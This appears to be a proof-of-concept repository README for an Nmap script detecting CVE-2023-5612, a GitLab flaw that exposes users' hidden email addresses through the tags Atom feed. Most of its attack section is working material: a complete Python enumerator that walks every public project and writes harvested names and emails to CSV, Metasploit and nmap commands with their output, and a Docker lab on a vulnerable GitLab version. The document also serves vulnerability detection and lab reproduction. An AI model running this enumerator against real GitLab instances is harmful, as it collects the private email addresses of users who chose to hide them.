Associated Vulnerability
Title: Missing Authorization in GitLab (CVE-2023-5612)
Description: An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
Description
Nmap NSE to check for CVE-2023-5612
Readme
# Disclosure of the public email in Tags RSS Feed
https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). It is now mitigated in the latest release and is assigned CVE-2023-5612.
```
https://nvd.nist.gov/vuln/detail/CVE-2023-5612
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
```
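The affected ranges quoted above are easy to misread (every release older than 16.6.6 is affected, not just the three named series). The following is an added example, not part of the NSE script or of GitLab, that classifies a version string against those ranges; it is for triaging a version you already know, and the active check described below stays authoritative, since a version number says nothing about backports or custom builds.

```python
# Added example, not part of the NSE script or of GitLab: classify a GitLab
# version string against the affected ranges quoted from the advisory.
import re

# Patched releases named in the advisory: within the 16.6, 16.7 and 16.8
# series everything below the listed patch is affected; every release older
# than 16.6.6 (for example the 16.5.x used in the lab below) is affected too.
FIRST_FIXED = (16, 6, 6)
FIXED_IN_SERIES = {(16, 6): (16, 6, 6), (16, 7): (16, 7, 4), (16, 8): (16, 8, 1)}


def parse_version(text):
    """Extract (major, minor, patch) from strings like '16.7.3', '16.7.3-ee'
    or 'GitLab Community Edition 16.5.10'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(text):
    """True if the version falls in a range the advisory lists as affected."""
    v = parse_version(text)
    if v[:2] in FIXED_IN_SERIES:
        return v < FIXED_IN_SERIES[v[:2]]
    return v < FIRST_FIXED  # 16.9+ and 17.x ship the fix; 16.5 and older do not
```

Usage: `is_affected("16.5.10")` is true, which is why the 16.5.10 image used for the lab below reproduces the issue even though 16.5 is not one of the three series GitLab shipped patches for.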
## Description
A vulnerability was discovered in GitLab that lets an attacker collect users' e-mail addresses (and names) even when some of those users have set their profile to private. The cause is that the `/api/v4/projects` endpoint can be queried without authentication, returning every project visible to anonymous users. For each project returned, take its `web_url` and request the `/-/tags?format=atom` endpoint under it; the XML response includes, among other things, the name and e-mail of each tag's author:
```xml
...
<name>test</name>
<email>test@test.com</email>
...
```
## NSE Dev
PoC:
- https://hackerone.com/reports/2208790
- https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
- https://sploitus.com/?query=CVE-2023-5612#exploits
**Note**: there is an [nse script](https://github.com/TopskiyPavelQwertyGang/Review.CVE-2023-5612) supposedly for this vulnerability, but its name and contents make it clear that this is a mistake and it has nothing to do with this CVE.
#### Algorithm:
1. Get the names of all projects visible without authentication:
```http
GET /api/v4/projects?output_mode=json HTTP/1.1
```
Example response:
```json
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
```
2. For each of them, fetch the tags in Atom XML format:
```http
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1
```
Example response:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
<id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
<link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
<title>1.0.0</title>
<summary></summary>
<content type="html"></content>
<media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&d=identicon"/>
<author>
<name>test</name>
<email>test@test.com</email>
</author>
</entry>
</feed>
```
In this feed we see the `name` and `email` fields of every author of a tag in the project. Their disclosure to an unauthenticated client is the essence of the vulnerability.
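The two steps above, as an added example in plain Python (standard library only); this is neither the NSE script nor Metasploit's module, and the function names and default target URL are this example's own. It goes a little beyond the fragment above in that it walks every page of the project list (the API returns 20 projects per page by default), tolerates a feed that is not well-formed XML, and skips a project whose feed fails to load instead of aborting. The sample responses embedded in it are constructed, trimmed from the responses shown above.

```python
# Added example, not the NSE script and not Metasploit's module: the two
# steps of the algorithm above as stand-alone Python (standard library only).
import json
import re
import sys
import urllib.request
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"

# Constructed samples trimmed from the responses shown above; they let the
# parsers be tried (and asserted on) without a running GitLab.
SAMPLE_PROJECTS_JSON = (
    '[{"id":3,"name":"project3","web_url":"http://localhost:8929/test/project3"},'
    '{"id":1,"name":"test","web_url":"http://localhost:8929/root/test"}]'
)
SAMPLE_TAGS_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<entry><id>http://localhost:8929/test/project3/-/tags/1.0.0</id><title>1.0.0</title>
<media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/x?s=80&amp;d=identicon"/>
<author><name>test</name><email>test@test.com</email></author></entry>
</feed>"""


def fetch(url, timeout=10):
    """GET a URL without credentials; the point of the bug is that none are needed."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2023-5612-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def project_web_urls(projects_json):
    """Step 1: web_url of each project in an /api/v4/projects response.
    Unauthenticated, the API only lists projects visible to everyone."""
    data = json.loads(projects_json)
    if not isinstance(data, list):  # e.g. an error object such as {"message": ...}
        return []
    return [p["web_url"] for p in data if isinstance(p, dict) and "web_url" in p]


def tags_feed_url(web_url):
    """Step 2: the tags Atom feed lives at <web_url>/-/tags?format=atom."""
    return web_url.rstrip("/") + "/-/tags?format=atom"


def authors_from_feed(atom_xml):
    """Sorted unique (name, email) pairs from the feed's <author> elements.
    Falls back to a regex when the feed is not well-formed XML."""
    found = set()
    try:
        for author in ET.fromstring(atom_xml).iter(ATOM + "author"):
            name = author.findtext(ATOM + "name", default="")
            email = author.findtext(ATOM + "email", default="")
            if email:
                found.add((name, email))
    except ET.ParseError:
        pat = re.compile(r"<author>\s*<name>(.*?)</name>\s*<email>(.*?)</email>", re.S)
        found.update(pat.findall(atom_xml))
    return sorted(found)


def enumerate_emails(base_url, fetch_fn=fetch):
    """Walk every page of the project list, pull each tags feed and return
    (email, name, project_url) rows. Projects without tags contribute nothing;
    a feed that fails to load is reported on stderr and skipped."""
    base = base_url.rstrip("/")
    rows, page = [], 1
    while True:
        urls = project_web_urls(fetch_fn(f"{base}/api/v4/projects?per_page=100&page={page}"))
        if not urls:
            break
        for web_url in urls:
            try:
                feed = fetch_fn(tags_feed_url(web_url))
            except Exception as exc:  # HTTP error or timeout for this project only
                print(f"[-] {web_url}: {exc}", file=sys.stderr)
                continue
            rows.extend((email, name, web_url) for name, email in authors_from_feed(feed))
        page += 1
    return rows


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8929"
    results = enumerate_emails(target)
    print("email,username,project_url")
    for row in results:
        print(",".join(row))
    print("[+] Author e-mails disclosed" if results else "[-] No author e-mails disclosed",
          file=sys.stderr)
```

An empty result only means no e-mail was obtained, not that the instance is patched: an instance with no public projects, or none that carry a tag, produces no rows either way, which is the same caveat the NSE script's "Projects list seems to be empty or unavailable" message carries.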
Example of successful exploitation:
```bash
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run
```
Result:
```bash
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: test@test.com
[+] name: Administrator
[+] e-mail: admin@example.com
[*] Auxiliary module execution completed
```
## NSE Test
Testing was done against `GitLab CE 16.5.10` (inside the affected range, since every release before 16.6.6 is affected).
#### `docker-compose.yml`
```yaml
# GITLAB_HOME must be exported before `docker compose up`, e.g. export GITLAB_HOME=$HOME/gitlab
services:
  gitlab:
    image: gitlab/gitlab-ce:16.5.10-ce.0
    container_name: gitlab-ce
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://localhost:8929'
        gitlab_rails['gitlab_shell_ssh_port'] = 2424
    ports:
      - '8929:8929'
      - '443:443'
      - '2424:22'
    volumes:
      - '$GITLAB_HOME/config:/etc/gitlab'
      - '$GITLAB_HOME/logs:/var/log/gitlab'
      - '$GITLAB_HOME/data:/var/opt/gitlab'
    shm_size: '256m'
```
#### Launch && prepare test env
1. Bring up the vulnerable `gitlab-ce` in docker:
```bash
sudo docker compose up
# the compose file names the container gitlab-ce, so that name works in place of {CONTAINER_ID}
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# Do not decode the shown base64-looking value, just use it as is
# Change root's creds to smth like root:toortoor
```
2. Prepare it:
- log in as root
- create a project
- create a tag in that project as `root`
- create a user `test` and log in as `test`
- create a project as `test`
- create a tag in that project as `test`
3. Run the script:
```bash
# full scan
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# fast scan
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast
```
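The "prepare it" step above is done by hand in the web UI. As an added example (not part of the NSE script or of GitLab), the same seeding through the GitLab REST API, so the lab can be rebuilt in one go. It assumes the compose setup above, an admin personal access token with the `api` scope in `ADMIN_TOKEN` (created under User settings > Access tokens), and this example's own user name, e-mail and password for the `test` account. Projects are created public, because an anonymous client only sees public projects in `/api/v4/projects` and their tag feeds, and `initialize_with_readme` gives each project a commit to tag. The `private_profile` flag on the new user is the setting the vulnerable feed ignores.

```python
# Added example, not part of the NSE script or of GitLab: reproduce the manual
# "prepare it" steps through the GitLab REST API. ADMIN_TOKEN is assumed to be
# an admin PAT with the "api" scope; user name, e-mail and password are this
# example's own choices.
import json
import os
import urllib.request

BASE_URL = os.environ.get("GITLAB_URL", "http://localhost:8929")
ADMIN_TOKEN = os.environ.get("ADMIN_TOKEN", "")


def plan_seed_requests(username="test", email="test@test.com", password="Testtest123!"):
    """The API calls behind the manual steps, as (step, method, path, body, who)
    tuples. Paths contain {placeholders} filled from earlier responses; `who`
    says which token sends the call."""
    public = {"visibility": "public", "initialize_with_readme": True}  # README = a commit to tag
    tag = {"tag_name": "1.0.0", "ref": "main"}
    return [
        ("root project", "POST", "/api/v4/projects", dict(name="test", **public), "admin"),
        ("root tag", "POST", "/api/v4/projects/{root_project_id}/repository/tags", tag, "admin"),
        # private_profile is the visibility setting the vulnerable feed ignores
        ("user", "POST", "/api/v4/users",
         {"username": username, "name": username, "email": email, "password": password,
          "skip_confirmation": True, "private_profile": True}, "admin"),
        ("user token", "POST", "/api/v4/users/{user_id}/personal_access_tokens",
         {"name": "seed", "scopes": ["api"]}, "admin"),
        ("user project", "POST", "/api/v4/projects", dict(name="project3", **public), "user"),
        ("user tag", "POST", "/api/v4/projects/{user_project_id}/repository/tags", tag, "user"),
    ]


def call_api(method, path, body, token):
    """Send one JSON request authenticated with PRIVATE-TOKEN; return the decoded reply."""
    req = urllib.request.Request(
        BASE_URL + path, data=json.dumps(body).encode(), method=method,
        headers={"PRIVATE-TOKEN": token, "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


def seed(plan, call_fn=call_api, admin_token=ADMIN_TOKEN):
    """Execute the plan in order, threading ids and the new user's token from
    each response into the later calls. Returns the ids that were created."""
    ctx, tokens = {}, {"admin": admin_token}
    for step, method, path, body, who in plan:
        reply = call_fn(method, path.format(**ctx), body, tokens[who])
        if step == "root project":
            ctx["root_project_id"] = reply["id"]
        elif step == "user":
            ctx["user_id"] = reply["id"]
        elif step == "user token":
            tokens["user"] = reply["token"]  # later calls act as the test user
        elif step == "user project":
            ctx["user_project_id"] = reply["id"]
        print(f"[+] {step}: ok")
    return ctx


if __name__ == "__main__":
    if not ADMIN_TOKEN:
        raise SystemExit("set ADMIN_TOKEN to an admin personal access token with the api scope")
    print(seed(plan_seed_requests()))
```

Running it once against a fresh container leaves the instance in the state the manual steps describe (root's tag on `root/test`, the test user's tag on `test/project3`), after which the nmap commands above can be run unchanged.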
Example of successful exploitation:
```bash
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
http://localhost:8929/test/project3
http://localhost:8929/testgroup/project2
http://localhost:8929/root/test
[+] Results:
email,username,project_url
test@test.com,test,http://localhost:8929/test/project3
admin@example.com,Administrator,http://localhost:8929/testgroup/project2
admin@example.com,Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
8929/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# view saved results, show only emails
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
admin@example.com
test@test.com
```
Example of an unsuccessful run against a target that is not GitLab:
```bash
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
```
Example run against a real, non-vulnerable target:
```bash
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################
```
## Links
- https://vuldb.com/?id.252096
- https://hackerone.com/reports/2208790
- https://www.rapid7.com/db/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure/
- https://scm.cms.hu-berlin.de/safeguarding/cvelistV5/-/blob/cve_2025-05-08_0800Z/cves/2023/5xxx/CVE-2023-5612.json
- https://docs.gitlab.com/install/docker/installation/
- https://hub.docker.com/r/gitlab/gitlab-ce/tags/?page=4
- https://hub.docker.com/layers/gitlab/gitlab-ce/16.5.10-ce.0/images/sha256-a8a3b7904bb5f92b7fd55e924d65c08aac1999ba5a2670f17c00472918ae6f42
- https://cve.akaoma.com/cve-2023-5612
File Snapshot
[4.0K] /data/pocs/29db85d6c703938e34a50e5807aac4a4a6023549
├── [7.8K] cve-2023-5612.nse
├── [ 523] docker-compose.yml
└── [ 11K] README.md
0 directories, 3 files